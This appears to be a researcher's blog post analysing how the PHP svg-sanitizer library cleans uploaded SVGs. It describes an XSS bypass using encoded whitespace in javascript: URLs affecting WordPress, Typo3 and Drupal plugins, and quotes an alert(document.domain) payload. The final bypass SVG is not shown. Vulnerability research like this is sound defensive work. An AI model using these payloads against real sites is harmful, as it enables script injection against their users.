When you plan to copy code, you could see some free bugs !!!

When doing some project using php, I need a function to upload a safe SVG, so I search google and found this: svg-sanitizer(https://github.com/darylldoyle/svg-sanitizer). But I have a question, is it really safe? I see some plugin written in wordpress, drupal used it. Also Core Typo3 CMS used it. But it cannot make me convince.
Analyse how it sanitized:

Main function to sanitized, will explain like this:
1. Remove all php script tag

$dirty = preg_replace('/<\?(=|php)(.+?)\?>/i', '', $dirty);

2. Load XML and remote all doctype

        $loaded = $this->xmlDocument->loadXML($dirty);
        // If we couldn't parse the XML then we go no further. Reset and return false

        if (!$loaded) {
            return false;


3. Clean XML tag
3.1 Clean XMl tag from whitelist
3.2 Clean XLink Href from XML xlink:href (https://developer.mozilla.org/en-US/docs/Web/SVG/Attribute/xlink:href) and also have a whitelist

    protected function cleanXlinkHrefs(\DOMElement $element)
        $xlinks = $element->getAttributeNS('http://www.w3.org/1999/xlink', 'href');
        if (preg_match(self::SCRIPT_REGEX, $xlinks) === 1) {
            if (!in_array(substr($xlinks, 0, 14), array(
                'data:image/png', // PNG
                'data:image/gif', // GIF
                'data:image/jpg', // JPG
                'data:image/jpe', // JPEG
                'data:image/pjp', // PJPEG
            ))) {

                $element->removeAttributeNS( 'http://www.w3.org/1999/xlink', 'href' );

3.3 Clean Href follow blacklist

    protected function cleanHrefs(\DOMElement $element)
        $href = $element->getAttribute('href');

        if (preg_match(self::SCRIPT_REGEX, $href) === 1) {

with SCRIPT_REGEX is /(?:\w+script|data):/xi

It will remove all schema from *script and data, but not safe enough, possible to bypass with some character like \s in URL. Remember the payload from https://portswigger.net/web-security/cross-site-scripting/cheat-sheet,
The html code below will work

<a href='javascript\x09:alert(document.domain)'>

. But, the first stuck is
4. remove all non-printable and replace \s with space
However, entities is allow and auto decode in attribute value of tag like this

hm, but LoadXML from DOMDocument will encode it and return to

<a href='javascript:alert(document.domain)'>

So, I try with double encode:

but, &# x09; is decode as & amp ;

And this is the second stuck.

But if chain two stuck above, I get the payloads bypass this function:

So I build SVG to bypass this library:

Just testing for Safe SVG Plugin 1.9.4 in WordPress:

And Typo3 LTS 10:

Some module in drupal (svg_sanitizer, svg_upload_sanitizer,…)